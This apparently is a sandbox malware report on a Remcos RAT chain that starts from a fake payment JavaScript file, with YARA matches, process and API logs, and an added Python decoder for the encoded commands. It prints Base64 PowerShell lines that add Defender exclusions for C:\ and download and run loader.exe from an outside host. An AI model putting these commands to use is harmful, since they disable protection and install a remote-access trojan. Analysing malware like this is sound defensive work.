Source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: colorcpl.exe PID: 7724, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\loader.exe
Source: Payment reference no. - FT910298955674.js Static file information: Suspicious name
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBuAGEAdwBhAHQAYgBzAGMALgBjAG8AbQAvAGYAaQBsAGUALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAbwB1AHQAcAB1AHQACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA==
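The three -enc operands above are Base64 over the script encoded as UTF-16LE, which is why a plain Base64 decode shows a NUL after every character. The Python below is an editor's added example and not part of the Joe Sandbox report: it takes the three powershell.exe command lines copied from this section, recovers the cleartext, and pulls out the download URL, the drop path, the registry key and the Defender tampering. The helper names and the indicator regexes are the example's own.

```python
"""Decode powershell.exe -EncodedCommand blobs from process-creation lines and
pull the indicators out of the cleartext script."""
import base64
import re

# Child command lines copied verbatim from the wscript.exe -> powershell.exe
# process-creation lines above.
PS_EXE = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
REPORT_CMDLINES = [
    PS_EXE + " -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA",
    PS_EXE + " -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==",
    PS_EXE + " -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBuAGEAdwBhAHQAYgBzAGMALgBjAG8AbQAvAGYAaQBsAGUALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAbwB1AHQAcAB1AHQACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA==",
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# case-insensitively, so capture the flag name and check it is a prefix instead of
# hard-coding one spelling. The operand is a Base64 token with optional padding.
FLAG_RE = re.compile(r"(?:^|\s)-([A-Za-z]+)\s+([A-Za-z0-9+/]+=*)")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Drive-letter paths (C:\...) and PowerShell env-var paths ($env:Temp/...); the \b
# stops the "p:" in "http:" from being read as a drive letter.
PATH_RE = re.compile(r"(?:\b[A-Za-z]:|\$env:\w+)[\\/][^\s\"']*")
# Registry keys with spaces are quoted on the command line, so stop at the quote.
REG_RE = re.compile(r"HK(?:LM|CU|CR|U|CC)\\[^\"']+")
DEFENDER_TAMPER = ("add-mppreference", "set-mppreference", "windows defender\\exclusions")


def find_encoded_blobs(cmdline):
    """Return every Base64 operand of an -EncodedCommand-style flag in a command line."""
    return [blob for name, blob in FLAG_RE.findall(cmdline)
            if "encodedcommand".startswith(name.lower())]


def decode_encoded_command(blob):
    """-EncodedCommand is Base64 over the script in UTF-16LE; decoding the bytes as
    UTF-8 yields a string riddled with NULs, the usual mistake in hand triage."""
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2:
        raise ValueError("UTF-16LE payload must have an even number of bytes")
    return raw.decode("utf-16-le")


def extract_iocs(script):
    lowered = script.lower()
    return {
        "urls": URL_RE.findall(script),
        "paths": PATH_RE.findall(script),
        "registry_keys": REG_RE.findall(script),
        "defender_tampering": any(k in lowered for k in DEFENDER_TAMPER),
    }


def triage(cmdline):
    """Decode every encoded operand in a command line and summarise what it does."""
    scripts = [decode_encoded_command(b) for b in find_encoded_blobs(cmdline)]
    return {"scripts": scripts, "iocs": [extract_iocs(s) for s in scripts]}


if __name__ == "__main__":
    for line in REPORT_CMDLINES:
        result = triage(line)
        for script, iocs in zip(result["scripts"], result["iocs"]):
            print(script.rstrip())
            print("  ->", iocs)
```

Decoded, the first two commands exclude the whole system drive from Defender scanning, once through Add-MpPreference -ExclusionPath and once by writing the same exclusion as a value under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths (the reg.exe child listed further down). The third fetches loader.exe into %TEMP% with Invoke-WebRequest and starts it, which is the dropped C:\Users\user\AppData\Local\Temp\loader.exe above. The stray quote in the first script ("Add-MpPreference -ExclusionPath "C:\) is why the child command line appears as -command "Add-MpPreference -ExclusionPath " C:\; powershell.exe joins the remaining arguments onto the -command string, so the exclusion is still added.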
Source: C:\Windows\SysWOW64\colorcpl.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03003220 NtAllocateVirtualMemory, 14_2_03003220
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300A1A8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 14_2_0300A1A8
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300A03C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 14_2_0300A03C
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300A0C4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 14_2_0300A0C4
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300356C NtWriteVirtualMemory, 14_2_0300356C
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03007F10 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx, 14_2_03007F10
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300321E NtAllocateVirtualMemory, 14_2_0300321E
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300564A GetThreadContext,SetThreadContext,NtResumeThread, 14_2_0300564A
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300564C GetThreadContext,SetThreadContext,NtResumeThread, 14_2_0300564C
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03003B88 NtProtectVirtualMemory, 14_2_03003B88
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03009FE8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 14_2_03009FE8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C8EAD9 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA, 20_2_06C8EAD9
Source: C:\Users\user\Links\Xdnxwtne.PIF Code function: 21_2_0303A1A8 NtOpenFile,NtReadFile,NtClose, 21_2_0303A1A8
Source: C:\Users\user\Links\Xdnxwtne.PIF Code function: 21_2_03037F10 NtOpenProcess, 21_2_03037F10
Source: C:\Users\user\Links\Xdnxwtne.PIF Code function: 21_2_0303356C NtWriteVirtualMemory, 21_2_0303356C
Source: C:\Users\user\Links\Xdnxwtne.PIF Code function: 21_2_03033607 NtWriteVirtualMemory, 21_2_03033607
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00416861 ExitWindowsEx,LoadLibraryA,GetProcAddress, 20_2_00416861
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C87672 ExitWindowsEx,LoadLibraryA,GetProcAddress, 20_2_06C87672
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFB9ABC39D1 11_2_00007FFB9ABC39D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFB9ABC2E11 11_2_00007FFB9ABC2E11
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FF20B4 14_2_02FF20B4
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FFD04A 14_2_02FFD04A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0042809D 20_2_0042809D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0045412B 20_2_0045412B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004421C0 20_2_004421C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004281D7 20_2_004281D7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0043E1E0 20_2_0043E1E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041E29B 20_2_0041E29B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004373DA 20_2_004373DA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00438380 20_2_00438380
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00453472 20_2_00453472
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0042747E 20_2_0042747E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0043E43D 20_2_0043E43D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004325A1 20_2_004325A1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0043774C 20_2_0043774C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041F809 20_2_0041F809
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004379F6 20_2_004379F6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004279F5 20_2_004279F5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0044DAD9 20_2_0044DAD9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00433C73 20_2_00433C73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00413CA0 20_2_00413CA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00437CBD 20_2_00437CBD
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0043DD82 20_2_0043DD82
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00435F52 20_2_00435F52
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00437F78 20_2_00437F78
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0043DFB1 20_2_0043DFB1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C9061A 20_2_06C9061A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA855D 20_2_06CA855D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C9828F 20_2_06C9828F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CC4283 20_2_06CC4283
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA81EB 20_2_06CA81EB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C98EAE 20_2_06C98EAE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CB2FD1 20_2_06CB2FD1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C98FE8 20_2_06C98FE8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CAEFF1 20_2_06CAEFF1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CC4F3C 20_2_06CC4F3C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CAEDC2 20_2_06CAEDC2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA8D89 20_2_06CA8D89
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA6D63 20_2_06CA6D63
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA8ACE 20_2_06CA8ACE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA4A84 20_2_06CA4A84
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C84AB1 20_2_06C84AB1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CAEB93 20_2_06CAEB93
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CBE8EA 20_2_06CBE8EA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA8807 20_2_06CA8807
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C98806 20_2_06C98806
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CAF24E 20_2_06CAF24E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA33B2 20_2_06CA33B2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C8F0AC 20_2_06C8F0AC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA9191 20_2_06CA9191
Source: C:\Users\user\Links\Xdnxwtne.PIF Code function: 21_2_030220B4 21_2_030220B4
Source: C:\Users\user\Links\Xdnxwtne.PIF Code function: String function: 0302457C appears 574 times
Source: C:\Users\user\Links\Xdnxwtne.PIF Code function: String function: 03024414 appears 154 times
Source: C:\Users\user\Links\Xdnxwtne.PIF Code function: String function: 03033FB4 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: String function: 03003FB4 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: String function: 03004030 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: String function: 02FF4240 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: String function: 02FF4414 appears 246 times
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: String function: 02FF421C appears 67 times
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: String function: 02FF457C appears 799 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 004351E0 appears 55 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 06CA58E0 appears 43 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 00434ACF appears 43 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 00401F96 appears 49 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 06CA5FF1 appears 55 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 00401EBF appears 32 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 06C72F28 appears 39 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 00402117 appears 45 times
Source: Payment reference no. - FT910298955674.js Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: colorcpl.exe PID: 7724, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
